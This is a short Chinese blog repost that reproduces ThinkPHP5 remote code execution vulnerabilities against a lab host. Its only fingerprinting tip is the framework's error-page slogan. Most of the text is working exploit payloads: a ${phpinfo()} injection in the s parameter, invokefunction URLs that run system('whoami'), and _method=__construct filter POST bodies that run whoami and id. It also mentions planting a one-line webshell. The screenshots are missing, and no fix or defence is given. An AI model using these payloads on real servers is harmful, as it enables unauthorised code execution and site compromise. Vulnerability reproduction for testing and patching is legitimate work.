当前位置:   article > 正文

ThinkPHP代码执行漏洞_thinkphp5 漏洞

thinkphp5 漏洞

一、ThinkPHP5代码执行漏洞

特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发

二、复现

1)

在这里插入图片描述访问
在这里插入图片描述poc:http://192.168.133.128:8080/index.php?s=1/2/3/${phpinfo()}
在这里插入图片描述写入一句话木马:
在这里插入图片描述

2)

在这里插入图片描述访问:
在这里插入图片描述
poc:
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
在这里插入图片描述任意代码执行:
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
在这里插入图片描述

3)

在这里插入图片描述访问:
在这里插入图片描述poc1:
_method=__construct&filter[]=system&method=get&get[]=whoami
在这里插入图片描述poc2:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/480880
推荐阅读
  

闽ICP备14008679号